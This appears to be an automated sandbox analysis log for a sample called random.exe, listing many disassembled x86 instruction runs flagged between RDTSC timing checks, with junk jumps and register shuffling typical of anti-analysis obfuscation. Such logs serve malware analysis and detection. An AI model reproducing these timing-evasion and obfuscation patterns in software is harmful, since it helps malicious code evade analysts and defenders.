Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50805E5 second address: 5080650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F19A4DEDF2Fh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and dword ptr [eax+04h], 00000000h 0x00000012 pushad 0x00000013 mov edx, 67EA5746h 0x00000018 pushfd 0x00000019 jmp 00007F19A4DEDF37h 0x0000001e sub ecx, 72D5F5CEh 0x00000024 jmp 00007F19A4DEDF39h 0x00000029 popfd 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F19A4DEDF2Dh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080060 second address: 5080064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080064 second address: 508006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508006A second address: 5080087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F65049h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080087 second address: 50800B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F19A4DEDF2Ch 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007F19A4DEDF2Eh 0x00000015 mov ax, 88D1h 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50800B9 second address: 50800BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50800BD second address: 50800D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50800D6 second address: 50800DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080325 second address: 5080334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080334 second address: 508033A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508033A second address: 508033E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508033E second address: 5080374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F19A4F6503Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F19A4F65040h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edi, 4EDF63A0h 0x0000001e movsx ebx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5080374 second address: 508037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 508037A second address: 508037E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0608 second address: 50A0625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0625 second address: 50A0635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F6503Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0635 second address: 50A0639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0639 second address: 50A06A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F19A4F65047h 0x0000000f xchg eax, ecx 0x00000010 jmp 00007F19A4F65046h 0x00000015 push eax 0x00000016 jmp 00007F19A4F6503Bh 0x0000001b xchg eax, ecx 0x0000001c jmp 00007F19A4F65046h 0x00000021 mov eax, dword ptr [774365FCh] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F19A4F6503Ah 0x0000002f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A06A7 second address: 50A06AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A06AD second address: 50A06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A06B3 second address: 50A06B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A06B7 second address: 50A06BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A06BB second address: 50A074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov ecx, 78ED5F81h 0x00000010 movzx esi, di 0x00000013 popad 0x00000014 je 00007F1A171011BDh 0x0000001a jmp 00007F19A4DEDF39h 0x0000001f mov ecx, eax 0x00000021 jmp 00007F19A4DEDF2Eh 0x00000026 xor eax, dword ptr [ebp+08h] 0x00000029 pushad 0x0000002a mov cx, di 0x0000002d mov ebx, 2D99680Eh 0x00000032 popad 0x00000033 and ecx, 1Fh 0x00000036 jmp 00007F19A4DEDF35h 0x0000003b ror eax, cl 0x0000003d jmp 00007F19A4DEDF2Eh 0x00000042 leave 0x00000043 jmp 00007F19A4DEDF30h 0x00000048 retn 0004h 0x0000004b nop 0x0000004c mov esi, eax 0x0000004e lea eax, dword ptr [ebp-08h] 0x00000051 xor esi, dword ptr [00732014h] 0x00000057 push eax 0x00000058 push eax 0x00000059 push eax 0x0000005a lea eax, dword ptr [ebp-10h] 0x0000005d push eax 0x0000005e call 00007F19A979E5ADh 0x00000063 push FFFFFFFEh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A074F second address: 50A0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0753 second address: 50A0757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0757 second address: 50A075D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A075D second address: 50A0781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007F19A4DEDF30h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, ecx 0x00000014 mov si, 2065h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0781 second address: 50A0793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F6503Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0793 second address: 50A0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0797 second address: 50A07BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007F19A991570Fh 0x00000010 mov edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F19A4F65049h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A07BF second address: 50A07C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A07C5 second address: 50A07D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A07D4 second address: 50A07FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F19A4DEDF35h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A07FA second address: 50A0800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0800 second address: 50A0829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F19A4DEDF30h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0829 second address: 50A082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A082D second address: 50A0831 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50A0831 second address: 50A0837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505001A second address: 505001E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505001E second address: 5050024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050024 second address: 505004E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 41FD3CB7h 0x00000008 mov ax, ED53h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 movzx ecx, dx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov bh, 50h 0x00000019 push ecx 0x0000001a pop esi 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ax, AC25h 0x00000025 mov si, E5A1h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505004E second address: 5050083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov esi, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d jmp 00007F19A4F65045h 0x00000012 xchg eax, ecx 0x00000013 pushad 0x00000014 mov dh, al 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edx, 1176DF62h 0x00000020 mov bx, 8FAEh 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050083 second address: 50500C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F19A4DEDF30h 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F19A4DEDF30h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov cx, 80B3h 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50500C9 second address: 5050124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F19A4F6503Bh 0x00000009 sbb ecx, 0FC97B1Eh 0x0000000f jmp 00007F19A4F65049h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F19A4F65040h 0x0000001b xor ax, 4918h 0x00000020 jmp 00007F19A4F6503Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050124 second address: 5050128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050128 second address: 505012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505012E second address: 5050147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050147 second address: 505014E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505014E second address: 5050173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 jmp 00007F19A4DEDF2Ch 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F19A4DEDF2Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050173 second address: 505019F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F19A4F65041h 0x00000009 xor ch, 00000076h 0x0000000c jmp 00007F19A4F65041h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505019F second address: 50501DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov si, di 0x0000000e pushfd 0x0000000f jmp 00007F19A4DEDF35h 0x00000014 and cx, F186h 0x00000019 jmp 00007F19A4DEDF31h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50501DB second address: 5050213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F19A4F65041h 0x00000014 adc al, FFFFFF96h 0x00000017 jmp 00007F19A4F65041h 0x0000001c popfd 0x0000001d push ecx 0x0000001e pop edi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050213 second address: 505026F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b call 00007F19A4DEDF2Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushfd 0x00000014 jmp 00007F19A4DEDF31h 0x00000019 sbb eax, 192ECC56h 0x0000001f jmp 00007F19A4DEDF31h 0x00000024 popfd 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F19A4DEDF2Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505026F second address: 5050275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050275 second address: 5050279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050279 second address: 505029C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F19A4F6503Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505029C second address: 50502A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50502A2 second address: 50502A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50502A6 second address: 50502AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50502AA second address: 50502C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 7D87h 0x00000011 jmp 00007F19A4F6503Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50502C8 second address: 50502DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4DEDF2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50502DA second address: 5050358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4F6503Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F1A172C3360h 0x00000011 pushad 0x00000012 push ecx 0x00000013 movsx ebx, ax 0x00000016 pop ecx 0x00000017 mov cx, bx 0x0000001a popad 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F19A4F65045h 0x00000029 jmp 00007F19A4F6503Bh 0x0000002e popfd 0x0000002f mov dx, cx 0x00000032 popad 0x00000033 je 00007F1A172C3338h 0x00000039 pushad 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e pushfd 0x0000003f jmp 00007F19A4F6503Ah 0x00000044 or ecx, 7B9DAA58h 0x0000004a jmp 00007F19A4F6503Bh 0x0000004f popfd 0x00000050 popad 0x00000051 mov edx, dword ptr [esi+44h] 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050358 second address: 5050394 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F19A4DEDF2Dh 0x0000000c and ch, FFFFFFF6h 0x0000000f jmp 00007F19A4DEDF31h 0x00000014 popfd 0x00000015 popad 0x00000016 or edx, dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F19A4DEDF2Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5050394 second address: 50503D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test edx, 61000000h 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 mov cl, C2h 0x00000016 popad 0x00000017 jne 00007F1A172C3313h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov edx, eax 0x00000022 pushfd 0x00000023 jmp 00007F19A4F6503Ch 0x00000028 adc ax, 10A8h 0x0000002d jmp 00007F19A4F6503Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50503D5 second address: 505041C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007F19A4DEDF2Eh 0x00000012 jne 00007F1A1714C1C3h 0x00000018 pushad 0x00000019 mov al, 2Ah 0x0000001b movsx ebx, cx 0x0000001e popad 0x0000001f test bl, 00000007h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx edi, cx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 505041C second address: 5050421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040796 second address: 50407AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4DEDF34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50407AE second address: 5040808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F19A4F6503Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F19A4F65040h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F19A4F6503Eh 0x0000001d xor ecx, 1F29BE08h 0x00000023 jmp 00007F19A4F6503Bh 0x00000028 popfd 0x00000029 popad 0x0000002a and esp, FFFFFFF8h 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx edx, si 0x00000033 movzx esi, di 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040808 second address: 504086F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F19A4DEDF30h 0x00000009 and eax, 0DDD3398h 0x0000000f jmp 00007F19A4DEDF2Bh 0x00000014 popfd 0x00000015 mov ebx, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F19A4DEDF32h 0x00000020 push eax 0x00000021 jmp 00007F19A4DEDF2Bh 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 mov esi, 6DD1574Bh 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F19A4DEDF2Fh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 504086F second address: 5040887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F19A4F65044h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5040887 second address: 50408A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F19A4DEDF2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50408A1 second address: 50408A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50408A5 second address: 50408AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50408AB second address: 50408C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F19A4F6503Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50408C5 second address: 50408CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 50408CB second address: 50408CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
